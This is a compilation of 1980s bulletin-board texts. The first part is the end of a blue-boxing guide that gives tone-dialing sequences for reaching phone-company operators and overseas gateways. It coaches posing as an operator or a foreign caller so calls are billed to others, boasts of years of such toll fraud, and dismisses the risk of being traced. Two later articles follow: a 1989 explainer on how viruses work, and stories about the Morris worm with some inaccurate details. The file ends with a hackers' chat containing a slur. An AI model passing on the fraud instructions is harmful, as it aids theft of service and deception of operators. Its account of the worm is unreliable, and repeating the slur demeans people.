KP+101+ST ...... toll test board KP+121+ST ...... inward op KP+131+ST ...... directory assistance KP+141+ST ...... was rate & route. Now only works in 312, 815, 717, and a few others. It has been replaced with a universal rate & route number, 800+141+1212. KP+151+ST ...... overseas completion operator (inbound). Works only in certain NPAs, such as 303. KP+181+ST ...... in some areas, toll station for small towns Thus, if you seize a trunk in 806 NPA and wanted an inward (in 806), then you would dial KP+121+ST. If you wanted a 312 inward and were dialing on an 806 trunk, an area code would be required. Thus, you would dial KP+312+121+ST. Finally, some places in the network require special routing, in addition to an area code. An example is Franklin Park, Ill. It requires a special routing of 032. For this, you would dial KP+312+032+121+ST for a Franklin Park inward operator. Special routings are in the format of 0XX. They are used primarily for load balance, so that traffic flow may be evenly distributed. About half of the exchanges in the network require special routing. Note that special routings are NEVER EVER EVER used to dial normal telephone numbers, only operators. Operator functions: TOLL TEST BOARD- Generally a cordboard position that assists in trunk testing. They are not used by operators, only switchmen. INWARD- Assists the normal TSPS (0+) operator in completing calls out of the TSPS's area. Also, inwards perform emergency inerrupts when the number to be interrupted is out of the area code of the original (TSPS) operator. For example, a 303 operator has a customer that needs an emergency interrupt on 215-647-6969. The 303 operator gets the routing for the inward that covers 215-647, since she cannot do the interrupt herself. The routing is found to be only 215+ (no special routing required). So, the 303 operator keys KP+215+121+ST. An inward answers and the 303 says to her, "Inward, this is Denver. I need an emergency interrupt on 215-647-6969. My customer's name is Mark Tabas." The inward will then do the interrupt (off the line, of course). If the number to be interrupted had required special routing, such as, say, 312-456-1234 (spec routing 032), then the 303 operator would dial KP+312+032+121+ST for the inward to do that interrupt. DIRECTORY ASSISTANCE- These are the normal NPA+555+1212 operators that assist customers with obtaining telefone directory listings. Not much toll-fraud potential here, except maybe $0.50. RATE AND ROUTE- These operators are reached by dialing KP+800+141+1212+ST. They assist normal (TSPS) operators with rates and routings (thus the name). The only uses I typically have for them are the following: 1. Routing information. In the above example, when the 303 operator needed to dial an inward that served 215-647, she needed to know if any special routing was required and, if so, what it was. Assuming she would use rate and route, she would dial them and say nicely, "Operator's route, please, for 215-647." Rate & route would respond with "215 plus." This means that the operator would dial KP+215+121+ST to reach the inward that serves 215-647. If there were special routing required, such as in 312-456, rate & route would respond with "312 plus 032 plus." In that case, the operator would dial KP+312+032+ST for the inward that serves 312-456. It is good practice to ask for "operator's route" specifically, as there are also "numbers route" and "directory routes." If you do not specifically ask for operator's route, rate & route will generally assume that is what you want anyway. "Numbers" route refers to overseas calls. Example, you want to know how to reach a number in Geneva, Switzerland (and you already have the number). You would call routing and say "Numbers route, please, Geneva, Switzerland." The operator would respond with: "Mark 41+22. 011+041+ST (plus) 041+22" The "Mark 41+22" has to do with billing, so disregard it. The 011+041 is access to the overseas gateway (to be discussed in Part iii) and the 041+ 22+ is the routing for Geneva from the overseas sender. "Directory" routings are for directory assistance overseas. Example: you want a DA in Rome, Italy. You would call rate & route and say, "Directory routing please, for Rome, Italy." They would respond with "011+039+ST (plus) 039+1108 STart." As in the previous example, the 011+039 is access to the overseas gateway. The 039+1108 is a directory assistant in Rome. 2. Nameplace information. Rate & Route will give you the location of an NPA+ exchange. Example: "Nameplace please, for 215-648." The operator would respond with "Paoli, Pennsylvania." This isn't especially useful, since you can get the same information (legally) by dialing 0, but using rate & route is often much faster and it avoids having to hang up when you are already on a trunk. *NOTE on Rate & Route: As a blue boxer, always ask for "IOTC" routings. (e.g., "IOTC operator's route", "IOTC numbers route", etc.) This tells them that you want cordboard-type routings, not TSPS, because a blue boxer is actually just a cordboard position (that Bell doesn't know about). OVERSEAS COMPLETION OPERATOR (inbound)- These operators (KP+151+ST) assist in the completion of calls coming in to the United States from overseas. There are KP+151+ST operators only in a few NPAs in the country (namely 303). To use one, you would seize a trunk and dial KP+303+151+ST. Then you would tell the operator, for example, "This is Bangladesh calling. I need U.S. number 215-561-0562 please." [in a broken Indian accent]. She would connect you, and the bill would be sent to Bangladesh (where I've been billing my KP+151+ST calls for two years). Other internal Bell Operators. KP+11501+ST ...... universal operator KP+11511+ST ...... conference op KP+11521+ST ...... mobile op KP+11531+ST ...... marine op KP+11541+ST ...... long distance terminal KP+11551+ST ...... time & charges op KP+11561+ST ...... hotel/motel op KP+11571+ST ...... overseas (outbound) op These 115X1 operators are identical in routing to the 1X1 operators listed previously, with one exception. If special routing is required (0XX), then the trailing 1 is left off. Examples: A 312 universal op ... KP+312+11501+ST A Franklin Park (312-456) universal op (special routing 032 required).... ................... KP+312+032+1150+ST [The trailing 1 of 11501 is left off]. rposes of 115X1 operators. UNIVERSAL- Used for collect/callback calls to coin stations. CONFERENCE- This is a cordboard conference operator who will set up a conference for a customer on a manual operation basis. MOBILE- Assists in completion of calls to mobile (IMTS) type telefones MARINE- Assists in completion of calls to ocean going vessels. LONG DISTANCE TERMINAL- Now obsolete. Was used for completion of long distance calls. TIME & CHARGES- Will give exact costs of calls. Used to time calls and inform customer of exactly how much it cost. HOTEL/MOTEL- Handles calls to/from hotels and motels. OVERSEAS COMPLETION (outbound)- assists in completion of calls to overseas points. Only works in some, if any NPAs, because overseas assistance has been centraized to IOCC (covered in Part iii). Note that all KP+1X1+ST and KP+115X1+ST operators automatically assume that you are a TSPS or cordboard operator assisting a customer with a call. DO NOT DO ANYTHING TO JEOPARDIZE THIS! If you do not know what to do, don't call these operators! Find out what to do first. This concludes Part II. There is one final part in which I will explain overseas dialing, IOCC (International Overseas Completion Centre), RQS (Rate/Quote System), and some basic scanning. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Better Homes and Blue Boxing Part iii Advanced Signalling =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= (It is assumed that the reader has read and understood parts i & ii before proceeding to this part). In parts i & ii, I covered basic theory and domestic singalling and operators. In this part I will explain overseas direct boxing, the IOCC, the RQS, and some basic scanning methods. Overseas Direct Boxing. Calling outside of the United States and Canada is accomplished by using an "overseas gateway." There are 7 overseas gateways in the Bell System, and each one is designated to serve a certain region of the world. To initiate an overseas call, one must first access the gateway that the call is to be sent on. To do this automatically, decide which country you are calling and find its country code. Then, pad it to the left with zeros as required so it is three digits. [Add 1, 2, or 3 zeros as required]. Examples: Luxembourg (352) is 352 (stays the same) Spain (34) becomes 034 (1 zero added) U.S.S.R. (7) becomes 007 (2 zeros added) Next, seize a trunk and dial KP+011+ CC+ST. Note that CC is the three digit padded country code that you just determined by the above method. [For Luxembourg, dial KP+011+352+ST, Spain KP+011+034+ST, and the U.S.S.R. KP+011+ 007+ST]. This is done to route you to the appropriate overseas gateway that handles the country you are dialing. Even though every gateway will allow you to dial every dialable country, it is good practice to use the gateway that is designated for the country you are calling. After dialing KP+011+CC+ST (as CC is defined above) you should be connected to an overseas gateway. It will acknowledge by sending a wink (which is audible as a and a dial tone. Once you receive internat- ional dial tone, you may route your call one of two ways: a) as an operator-originated call, or b) as a customer-originated call. To go as a operator-originated call, key KP+ country code (NOT padded with zeros)+ city code+number+ST. You will then be connected, providing the country you are calling can receive direct-dialed calls. The U.S.S.R. is an example of a country that cannot. Example of a boxed int'l call: To make a call to the Pope (Rome, Italy), first obtain the country code, which is 39. Pad it with zeros so that it is 039. Seize a trunk and dial KP+011+039+ST. Wait for sender dial tone and then dial KP+39+6+6982+ST. 39 is the country code, 6 is the city code, and 6982 is the Pope's number in Rome. To go as an operator-originated call, simply place a zero in front of the country code when dialing on the gateway. Thus, KP+0+39+6+6982+ST would be dialed at sender dial tone. Routing your call as operator-originated does not affect much unless you are dialing an operator in a foreign country To dial an operator in a foreign country, you must first obtain the operator routing from rate & route for that country. Dial rate & route and if you're trying to get an operator in Yugoslavia, say nicely, "IOTC Operator's route, please, for Yugoslavia." [In larger countries it may be necessary to specify a city]. Rate & route will respond with, "38 plus 11029". So, dial your over- seas gateway, KP+011+038+ST, wait for sender dial tone, and key KP+0+38+ 11029+ST. You should then get an operator in Yugoslavia. Note that you must prefix the country code on the sender with a 0 because presumably only an operator here can dial an operator in a foreign country. When you dial KP+011+CC+ST for an overseas gateway, it is translated to a 3-digit sender code of the format 18X, depending on which sender is designated to handle the country you are dialing. The overseas gateways and their 3-digit codes are listed below. 182 ..... White Plains, NY 183 ..... New York, NY 184 ..... Pittsburg, PA 185 ..... Orlando, FL 186 ..... Oakland, CA 187 ..... Denver, CO 188 ..... New York, NY Dialing KP+182+ST would get you the sender in White Plains, and KP+183+ST would get the sender in NYC, etc., but the KP+011+CC+ST is highly suggested (as previously mentioned). To find out what sender you were routed to after dialing KP+011+CC+ST, dial (at int'l dial tone): KP+0000000+ST. If you have difficulty in reaching a sender, call rate and route and ask for a numbers route for the country you're dialing. Sometimes, KP+011+ padded country code+ST will not work. I have found this in many 3-digit country codes. Lexembourg, country code 352, for example, should be KP+011+352+ST theoretically. But it is not. In this case, dial KP+011+ 003+ST for the overseas gateway. If you have trouble, try dialing KP+00+ first digit of country code+ST, or call rate The IOCC. Sometimes when you call rate and route and ask for an "IOTC numbers route" or "IOTC operators route" for a foreign country, you will get something like "160+700" (as in the case of the Soviet Union). This means that the country is not dialable directly and must be handled through the International Overseas Completion Centre (IOCC). For an IOCC routing, pad the country code to the RIGHT with zeros until it is 3 digits. Then KP+160 is dialed, plus the padded country code, plus ST. Examples: The U.S.S.R. (7) ...... KP+160+700+ST Japan (81) ............ KP+160+810+ST Uraguay (598) ......... KP+160+598+ST You will then be routed to the IOCC in Pittsburg, PA, who will ask for country, city, and number being dialed. Many times they will ask for a ringback [thanks to Telenet Bob] so have a loop ready. They will then place the call and call you back (or sometimes put you through directly). Some calls, such as to Moscow, take several hours. The Rate Quote System (RQS). The RQS is the operator's rate/quote system. It is a computer used by TSPS (0+) operators to get rate and route information without having to dial the rate and route operator. In Part ii, I discussed getting an inward routing for dialing-assistance and emergency interrupts from the rate and route operators (KP+800+141+1212+ST). The same information is available from RQS. Say you want the inward routing for 305-994. You would sieze a trunk and dial KP+009+ST (to access the RQS). Sometimes, if you seize a trunk in an NPA not equipped with RQS, you need to dial an NPA that is equipped with RQS first, such as 303. Anyway, after you dial KP+009+ST or KP+303+009+ST, you will receive a wink () and then RQS dial tone. At RQS dial tone, for an inward routing for 305-994 you would dial KP+06+305+994+ST. That is, KP+06+NPA+exchange+ST. RQS will respond with "305 plus 033 plus". This means you would dial KP+305+033+121+ST for an inward that services 305-994. If no special routing were required, RQS would have responded with "305 plus" and you would simply dial: KP+305+121+ST for an inward. Another RQS feature is the echo feature. You can use it to test your blue box. Dial RQS (KP+009+ST) and then key KP+07+1234567890+ST. RQS will respond with voice identification of the digits it recognized, between the KP+07 and ST. RQS can also be used for rates and directory routings, but those are seldom needed, so they have been omitted here. Simple Scanning. If you're interested in scanning, try dialing on a trunk, routings in the format of KP+11XX1+ST. Begin with 11001 and scan to 11991. There are lots of interesting things to be found there, as Doctor Who (413 area) can tell you. Those 11XX1 routings can also be prefixed with an NPA, so if you want to scan area code 212, dial KP+212+ 11XX1+ST. There, now you know as much about blue boxing as most phreaks. If you read and understand the material, and put aside preconceived ideas of what blue boxing is that you may have aquired from inexperienced people or other bulletin boards, you should be well on you way to an enlightening career in blue boxing. If you follow the guidelines in Part i to box, you should have no problem with the fone company. Comments made by "phreaks" on bulletin boards that proclaim "tracing" of blue boxers are nonsense and should be ignored (except for a passing chuckle). NOTE 1: CCIS and the downfall of blue boxing. CCIS stands for Common Channel Inter- office Signalling. It is a signalling method used between electronic switching systems that eminiates the use of 2600Hz and 3700Hz supervisory signals, and MF pulsing. This is why many places cannot be boxed off of; they employ CCIS, or out-of-band signalling, which will not respond to any tones that you generate on the line. Eventually, all existing toll equipment will be upgraded or replaced with CCIS or T-carrier. In this case, we'll all be boxing with microwave dishes. Until then (about 1995 by current BOC/AT&T estimates), have fun! If you have ANY questions about this text, please feel free to drop me a line. I will respond to all mail, messages, etc. Insults are also welcomed. And if you discover anything interesting scanning, be sure to let me know. Mark Tabas $LOD$ This text was prepared in full by Mark Tabas for: K.A.O.S. Philadelphia, PA. [215-465-3593]. Any sysop may freely download this text and use it on his/her BBS, provided that none of it be altered in any way. Technical acknowledgements: Karl Marx, X-Man, High-Rise Joe, Telenet Bob, Lex Luthor, TUC, John Doe, Doctor Who (413 area), The Tone Sweep, Mr. Silicon, K00L KAT, The Glump. References: 1. Notes on the BOC Intra-LATA Networks Bell System publication, 1983. 2. Notes on the Network Bell System publication, 1983. 3. Engineering and Operations in the Bell System Bell System publication, 1983. 4. Notes on Distance Dialing Bell System publication, 1968. 5. Early Medieval Architecture. ....................................... (c) February 6, 1900 Mark Tabas ....................................... Call 1-305-994-9966 .................... (c) February 6, 1900 Mark Tabas ....................................... VI -- This is a text file I wrote for online magazine in 1989. Viruses.....The Computer Epidemic -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- In the early 80's, if you told a computer user of any sort that his her system could become infected with a virus, you would have probably been greeted with an out roar of laughter. Today, of course, this is not the case. Now when the words 'computer' and 'virus' are mentioned in the same sentence, computer users ears stand at attention. Viruses have become a serious threat, needless to say. The media doesn't help out the situation by blowing it up. Odds are that you will never have to come to grips with a computer virus, but there is always that possiblity. So this text was written to hopefully shed some light on the subject. First off, I often hear people blaming software and hardware problems on viruses, trojan horses, worms, logical bombs, etc. Usually it isn't a virus that is to blame. I hear comments like,'My hard drive crashed because a virus wrote over my FAT tracks', or what not. In the first place, hard drives do give out. It just happens. Second off, if there was a program that killed the hard drive, it wasn't a virus. It was more than likely a trojan horse. So, here in the text I would like to give a few definitions or programs that threat your system............ Worm Program - This is a program the reproduces itself by creating copies itself, but the actual code contains no instructions to replicate. That is, it does not infect other programs. The major difference between this and a virus is that a worm needs no host program to reproduce. Worms 'creep' through all levels of a computer without the need of a host program. This type of program is just as serious as any virus if not discovered in time. This type of program is which you often hear about involving banks. For example, a bank computer continue transfering money to an illicit account after being instructed to do so by the worm program, which then disappears. Once this type of program is discovered it is easy to get rid of, because it doesn't have the ability to reproduce (or infect other programs) Trojan Horse - This is often confused with viruses and worms. The objective of this program is much the same as the greek story. That is that it is a destructive program disguised as an innocent one. Trojan horses are not viruses because they do not reproduce themselves as viruses do. These programs tend to have a very destructive manner. They hide themselves in an program inviting to the user. While he is mesmerized at the program, it reformats his hard drive. This program can also be used to break into computer systems.For example, If a trojan horse is written on a low-level account, then when it is executed by a high level user, such as a sysop, the program up's the lower access level while the higher user is mezmerized by the niffty game or graphics or what not. Logic Virus - This is arguably a virus. These programs do not modify there host programs, they just simply delete them and take the place of the host program. For example, if A is a virus and B is a user program, then renaming A to B makes B appear as a virus. Logic Bombs - Very similar to a Trojan horse in its programing and ability to destroy data, but has a built-in timing device that sets it off. These programs also lack the ability to reproduce. For example, a employ hears that he is about to be laid off from the company he works at, he might install a logic bomb to go off one week at 3 p.m after the day he is laid off. The major difference between viruses and trojan horses, logic bombs and worms is there ability to reproduce. For a program to be considered a true virus, it must have the following properties......... 1. To be able to modify software not belonging to the virus program. 2. To be able to execute the modifications on a number of programs. 3. To be able to recognize a modified program that is already infected. 4. To be able to prevent further modifications to the same program upon reconition. 5. Modify software assuming attribute 1 to 4. Without one or more of these following properties, the program cannot be considered a true virus (except for the logical virus, and even this even argued at times). Now that thats been covered we can discuss the different types of viruses and how they work. First off there are basicly two types of viruses from a programing stand point. They are the overwritting and non-overwriting types. Overwriting are the simplest types of viruses. Over- writing viruses symptoms usually show up quickly as soon as the virus becomes acute. An overwritting virus destroys part of its host program code to imbed itself. Here is a graphic representation of a overwriting virus....... VIR - Virus Kernal MAN - Manipulation task of the virus. This is what the virus is suppost to do when 'awake' in the system. M - Marker Byte. This is so that the virus will know exactly what has been infected and what hasn't. This keeps the virus from reinfecting the same user programs. For the purpose of infiltrating the system,a program is deliberately infected with the virus. (This intentional infection is necessary to prevent an error message from occuring when the carrier program is started.) So here is our what our host program looks like...... M:VIR:MAN (Carrier program) When this program is started first. The marker byte M in this case is represented as a jump command charateristic of this virus (sometimes called 'null operation'). The virus kernal becomes active and is ready to do its destructive work. The virus now looks through mass storage to an executable program. It finds one and fetchs a small portion of that program into memory. It does this to see if a marker is present. If there is , that file has already been infected and will move on to the next use file. in this case lets say that there is not a marker present. So it looks like thus....... : : (Second user program) Now ,since it is an un-infected program, the program is overwritten, meaning that the virus destroys the program code for its own code. It now looks like thus........ M:VIR:MAN (Second user program) After the actual infection process is done, the manipulation task is executed. After the manipulation task is complete , execution returns to the carrier program and the user if fooled into thinking that the the program is running correctly. Now when the 2nd user program is started it goes on described as above.....So the 2nd user program is started..... M:VIR:MAN (Second user program) The 3rd user program is found with no marker present..... : : (Third user program) It gets infected like described above..... M:VIR:MAN (Third user program) Mysterious error messages will now start to occur, but by then the program has accomplished its goal, namely the execution of the manpulation program. I should also mention that the marker from virus to virus is different. Now it is true that a overwriting virus can survive without a host program, but it would be detected very easily. Overwritting viruses are usually hard to trace back to there host program. Non-overwritting viruses are usually the most dangerous. This type of virus can be present in a users system for years without him knowing it. Non- overwritting are similar to overwritting, except an additional MOV routine is added. VIR - Virus kernal MAN - Manipulation task MOV - Move routine for the program regenerator M - Marker Byte Here also a infected carrier program is used, but this one has no error! As with the overwritting virus there is a jump or null command at the start which represents the virus marker. If the virus is active it looks for executable programs just like the overwritting virus...... M:VIR:MAN:MOV (User program) The virus finds the 2nd user program, and in this case we will say that no marker is found. So it is uninfected...... : : : (Second user program) Now here is were is differs from the overwritting. First, a part of the program is selected which is the exact same length as the virus without the MOV routine. Part 1 : (Second user program) The selected first part is now copied to the end of the user program. The length of the user program does grow. Now it should be said that the manipulation takes place on mass storage and not in memory. Part 1 : (Second user program) : Part 1 : MOV This has so far worked much like the overwritting, in that the copy porcedure is the same. This means that the first part of the 2nd user program is overwritten by the virus program,so the MOV routine is not included since it is already at the end of the program. At the conclusion of this and the munipulation, the 2nd user program looks like this...... M:VIR:MAN: (Second user program) : Part 1 : MOV Part of the program has been overwritten because the virus code in this example program must be at the start of the program in order to make sure it is executed when the program is started. But the first part of the program has not been lost since it has been saved at the end or the program. Now the virus in the carrier program performs the desired manipulation and is execution continues with the carrier program itself. You basicly have the same situation as the first virus described, in that the virus does not replicate itself at first and does not exhibit any other activities. This condition remains the same till the 2nd user program is started. In the case the infection is transfered to the next uninfected file, or in this case we'll say the 3rd user program..... : : : (Third user program) After the 2nd user program... M:VIR:MAN: (Third user program) : Part 1 : MOV After the actual infection process and after the manipulation task has been executed, the MOV routine is activated. The entire infected 2nd user program is found in memory. From this the MOV routine selects the orginal start of the program that had been copied and moves it back.....like thus.... Before MOV.... M:VIR:MAN: (Second user program) : Part 1 : MOV After activation of MOV..... Part 1 : (Second user program) : Part 1 : MOV The original version is now in memory. The MOV routine preforms a jump to start of the program, where the program runs without error. The additions part and MOV are no longer needed and can be written over without error..... These two ways are the only two ways know at this time that I know first hand or read about for a virus to operate. So basicly , you can only have an overwritting or a non-overwritting virus. What exactly to watch out for...... =================================== For the most part, if you, yourself, are going to catch a virus, you need know what to look for.You should probably check every now and then to make sure that any files aren't suddenly increasing is size. It might also be wise to set up empty files (on the IBM, empty, 'com','exe', etc files) so you can go back every now and then to see if anything has attached to them. If your computer system saves a 'date-time stamp', it might be wise to check those every once and a while. It might be a good idea for you to set your attributes for read only on important programs (but this can easily be gotten around by some viruses. I know for a fact that Apple computers, on a write protected disk, can still be written on. Basicly there is no way to have a completely virus proof system. Even vaccination programs might not work on all viruses. These programs , though they are good to have, tend to look for virus traits in programs or they just check your 'time and date stamps', file sizes for you. These are usually effective programs but even they can fail. For example, what if you have a vaccine program that looks for certain virus traits but some niffty virus comes around using a different method? It could miss. I do think they are great to have around though, for those 'just in case times'. Now you might think 'why not just have a vaccine program that looks for the marker'. The problem there is that markers are different from virus to virus....But at any rate, here are the names and addresses for a few vaccine programs...... Disk Defender (For IBM PC's and compatables) Director Technologies 906 University Place Evanston, IL 60201 (312)491-2334 Price: $240 (Exellent) PC Safe (For IBM PC's and compatables) The Voice Connection 17835 Skypark Circle Irvine, CA 92714 (714)261-2366 Price: $45 Tracer (For IBM PC's and compatables) Interpath Corporation 4423 Cheeney Street Santa Clara, CA 95054 (408)727-455 I hope in some way or another. I know it gets confusing in parts, but usually reading it two or three times and you will get the over all picture. If you would like to know more about virus, like there source code, or have any questions, or you just feel like insulting me, please do. Drop me E-mail at... 'The Hurrican Hole' (XXX)XXX-XXXX To.... The Beaver (Member of SC/HA) (December 22, 1989) VII --- This is another artical I wrote for online magazine in 1989. Its just a bunch-o-storys and interviews. Not any technical info. Once upon a time,a disgrutled mainframe programmer was fired by the administrator overlords and summarily removed from the computers sanctum. All was well for six months, six days, and six hours. Suddenly, all the keyboards on the mainframe's terminals mysteriously ceased to function as the programmer's personally planted time bomb proceeded to lobotomize the system. The administrator watched in horror as the tape drivers locked up and all mounted tapes were erased, bit by bit. There was absolutely nothing they could do as the card reader/punch proceeded to randomly punch holes in all the program decks that were mounted at that time. Finnally, the disk and drum storage devices went through a complete erasing process, sending all their data to the Data Bardo. Meanwhile, the time bomb dutifully displayed its moment-by-moment blows on the main console monitor. Fortunately, the great sanctum had recently made a backup of all its data. At great expense to the administrarors, the sanctum programmers spent weeks restoring and generally recreating all lost files. A special team of crack programmers were hired to comb the operating system's source code carefully in search of the time bomb. Finnally, they found it and, with the skill of practiced surgeons, removed all traces of the software cancer. Once rebooted, the sanctum's system behaved beautifully, without a hitch......... .........Thats is, until six months, six days, six hours later, when the whole process repeated itself........ ( This is no fairy tale. This story is based on an actual incident that occured in the later 1960's, a time before personal computers, when giant dinosaurlike mainframes roamed the planted.) -Story as told by Allan Lundell- Author of 'Virus!' Internet Virus ............. ======================================================================== On November 2,1988, the Internet virus made its debut on planet earth. In less than 12 hours it had infected over six thousand computers scattered nationwide. All though this creature never reached its full potential, because it fell ill to a program bug, it was still one of the worst incidents in which a virus was the cause. The time was 9 p.m at MIT in artifical intelligence laboratory. Acting on a remote signal from Ithaca, New York, the internet virus was launched from its hard disk 'holding pen' into a telephone line, heading for internet. Its goal was widespread exploration and infection of the network without detection. It easily made its way past the entry test of the internet boundary guards, showing them a electronic 'internet technical' pass which allows a user to work on the send mail electronic system, which is high priority access. If this entry had not have worked, it would have sent the electronic guards thousands of possible password ID's with a good probability that one would have worked. Once in, the virus started to replicate everywhere, sending copies of itself in every direction of the the network. It rapidly filled up all the empty spaces on internet. At about 10 p.m. that night, Pascal Chesnais, a computer researcher working late a MIT noticed that all programs were slowing down to a crawl. Two or three of his friend also noticed the bizarre behavior. At first, they figured it was a legitimate program that had gone out of control because of an internal error. 'We thought it was just a run away program', he recalls. 'So we killed all processes and the problem seemed to go away'. Unconcerned, they went out for ice cream. Meanwhile, at the University of California, the virus penitrated its way there. There newly installed security software was detecting strange behavior on the network communications lines. 'Our security system alerted use that strange commands were come in form online', recalls Peter Yee, a scientist at the university. This early warning allowed them to contain the virus fast than any other node on internet. They not only got it to stop replicating but by shutting down there communication links but they also traped it to analyzed. Meanwhile , researchers at Bellcore, in Livingston New Jersey, joint research lab for the regional Bell holding companys discovered the virus at 10:30 p.m. they two were able to contain the virus by shutting down there computers fast......... At 10:34 p.m. the invader struck Princeton University, and was discovered by Victor Dukhovni, a twenty five year old system programmer. He also noticed that the system was moving slow. Working alone he idenified the probe in the mailing system, reproducing at a rapid rate. By now it had spread to NASA Ames Research, at 12 a.m they too cut off communication lines. At about this time, Pascal and friend returned from there ice-cream break it find that the system was once again performing strangly. Meanwhile Robert T. Morris, Jr., a twenty three year old Cornell university graduate student telephoned a friend at Harvard's Aiken Lab and asked him to send out an alert over the network on how to stop the virus. Unfortunately, it was sent to a obscure BBS never to be seen by any researchers. At 12:31 a.m. the virus struck John Hopkins University and at 1:15 a.m it hit the University of Ann Arbor. By 2:30 a.m., Pascal indentified that the virus was coming though the mail system, and stated that they must disconnect the computer from the network. At 3 a.m., Pascal want to bed knowing the serious state that the networks was in. Although the not all the systems one the network were not infected by the virus, but it wasn't a lack of trying. So systems recorded that there had been some 2000 attempts to login. Intresting enough was the fact that AT&T Bell Laboratories in Muray Hill, New Jersey, where the young Robert Morris, Jr., had worked for a time, escaped infection. About a year prior to the attack, Bell Labs had patched its software to eliminate the loophole in the electronic mail software. When Bell had tried to warn other groups of UNIX users of the potential security breach, Bell found that few shared 'our rather paranoid view of communications software'. Classified defense computers were not affected by the attack, even though ARPAnet (with in internet) is used for unclassified, defense related work. Fortunately, U.S. defense computers employ greater security precautions than unclassified systems, making the classified computers harder to penitrate. The virus only seemed to penetrate UNIX runned SUNs and VAXes, and by about 4 a.m. researchers figured out how the virus worked and had created a immunity and posted it on the internetwork, but with the virus being on the network, most systems had been taken down and few would read the message in time. Communications among researchers became limited by the fact that they mostly often would deal with electronic mail, and not by voice communications. With this in mind, it became harder to contact researchers with them taking down they computers to trap the virus. 'The sites without an emergency plan didn't do well', says Russel Brand, a artifical intelligence doctoral canidate at Berkeley. Soon, as voice communications became better, they all began to understand the structure of the virus and its inter makings. By earliy afternoon of Thursday, November 3, 1988 the virus code had been cracked, and slowly all the computers on the network began to come back on line. Within days, investigators identified tat Robert Morris Jr., as the probable source of the virus. What was this creature he had designed? The internet virus was actualy more of a worm than a virus. This worm had three ways by which it penetrated through machine security: Send mail attack, the Fingerd attack, and password cracking. In the send mail attack, the worm entered through a back door in the send mail utility that had been left there by the designer. The worm/virus made use of a little-known command called fingerd. This command ran in the background and was used to get names, addresses and phone numbers of users. What the virus did was send data to the buffer to fast causing the buffer of over load allowing the virus into the host enviorment (this is sometime called the rapid fire method, by hackers). The third method was by cracking usernames and passwords with a list it carried with it self of commonly used passwords and usernames. If this list failed, it would locate the UNIX dictionary, which is sometimes on the system, and start using words out of it as passwords. About 5% of the systems infected were through this method. The bug, that classified it as a full scale virus, was in that it started to infect the same files over and over instead of identifing it as already infected. When a file is infected, it grows in length, and when it re-infects a file it grow yet bigger. The virus/worm started to infect the same files thousands of times, causing the system to slow down and become over loaded. After the virus code was cracked, programmers claimed that it was 'fit for publication in a journal', in that it caused no real damage to the system. Robert Jr,. originally wanted the virus only to spead and infect systems and let him know exactly where the virus was, its rate of infection, it success rate, and how it got pass security. It was nothing more than an experiment gone bad. The funny part is that Robert Jr,. father Robert Sr,. in which he turned to the next day after the infection, was the top security specialist and help design the UNIX operating system. The whole thing was nothing more than experiment that a bad bug, but yet much data was consumed because of it. This was the first virus to come to the attention of the general public. Core Wars........... ========================================== This was a definite begining of where the thought of the danger of computer viruses got started. Core Wars was a game, and the object was for two programs be set inside a machine and these two programs would try to destroy each other. Usually by three methods. 1. Mobiltity - A program could move about, their by eluding direct hits. 2. Defense - A program could take a fit and repair itself. 3. Offense - Get it before it gets you. The creator of Core War soon relized that 'what if one other these programs escaped from the game and spead to other users?'. He relized that you could renender anything from SDI to lottus 1-2-3 useless. For More information on Core Wars and these battle machines, refer to .... 'Virus!' By Allan Lundell Contemporary Books, Chicago - New York or 'Computer Viruses,Worms,Data Diddlers,Killers programs and other threats to your system.' By John McAfee (Chairman of the Computer Vir. Industry Ass.) Forward Press. These books contain exellent information on viruses, and protection. Virus Discussion between two hackers........... Conducted on Jan. 7, 1990: 2 A.M in the morning. ================================================ (Nut-Kracker=KN Beaver=BV) KN: When I think of viruses, I tend to think of AIDs, I mean do you really Think AIDs would have spread in the 1750's even if there were drug users or fags, of course not, simple because that there were not that many people. If there were 2 million people in American, it would have never have spread. Much is the same with with computers. More people use them, there every were, in the home and government. If there weren't so many computers, do you really think that viruses would even be a discussion. Hell, no. If I had told you 7 years ago that you could get a computer virus, would you have believed me. BV: No, I would have probably laught at you, but of course if you explained it I would have seen the threat. Mostly because I already knew about trojan horses. KN: Exactly, its a pretty scary thought. At the rate the world is going with computers, I can see very little use for phones, besides can you talk at 19.2k baud. BV: HA, cant say I can, but I dont see use dropping the fone idea anytime soon. KN: Of course not, it wouldn't be for a while, but everything around you is becomimg more and more dependent on computers, and where computers are, there is a threat. Hell , in 10 years a virus will be nothing, more advanced method will come around. BV: Or just more advanced methods of virus creating. I can see a major threat with the government using virus, which they current probably use anyway. KN: Hell, with computers, the third world war could be thought behind a keyboard, there will be no need for guns and solders even though we will still have them. BV: I think the ultimate virus would be one that could pass software to biological. ( I snicker at the thought ) KN: Don't laugh, think of that Biotech VAX off of University of Florida's eithernet! BV: Shit, never thought about that...... KN: Think of when parent can decide what they want they what there kid to be. No parent whats his kid to have a kid with a hereitary disease. If you can decide what sex, hair color, etc you what it to be, why not a disease? BV: True, but I dont see that happening anytime soon. KN: About 30 year is my guess, of course they do test now for some diseases. BV: Ahhhh, data munipulation, say by 1/2. That is half the positive kids that come out with say cancer, you tell it to say they are negitive, ehh? KN: Exactly. They would probably be aborted anywway. This is a virus shooting out of the monitor but it could happen BV: (I think: I dont see this in wide use yet though.) (But they do test for some stuff? is it possible.) Ha! here goes one! what if a virus hit a AI computer! would it feel it?... ...... If it were true AI, of course it would. KN: What if you infected a AI system to become suicidal! BV: Actually, self replication is a big positive step for AI, in that it Doesn't rely on user input. Just think of govermnet agencies using viruses. KN: Yeah, computers launch and track missles, cause they dont use fuses anymore , (HA!). What if that system was infected with a virus from Iran they start to send bombs and all are computers will do is say 'The Iatolahoman Rules!' (HA) BV: (HA) But that would take some incredible effort, I hope there up on that and Im sure there aware of the threat. KN: Nothing is impossible. ( From here we talk about U.S. voting and viruses for a while and various stuff) KN: I think the ultimate virus could adapt to its enviorment on any system. BV: I see execution problems though. KN: True, you could write in all OS codes.... BV: That would be easy to identify!Plus you would still have execution problems KN: Yeah, but I see a day when there becomes a nessecity to have a standard OS, I mean look at the metric system. BV: We are already adapting to that, besides look at the internet virus, it infected both SUNs systems along with VAXes running under UNIX. KN: I even see a BIG general network, that everyone uses. BV: But you would have to keep the military and the private sectors on two different nets. KN: Look at say, tymnet, through time net you can get to another net, and so on and so on, theres 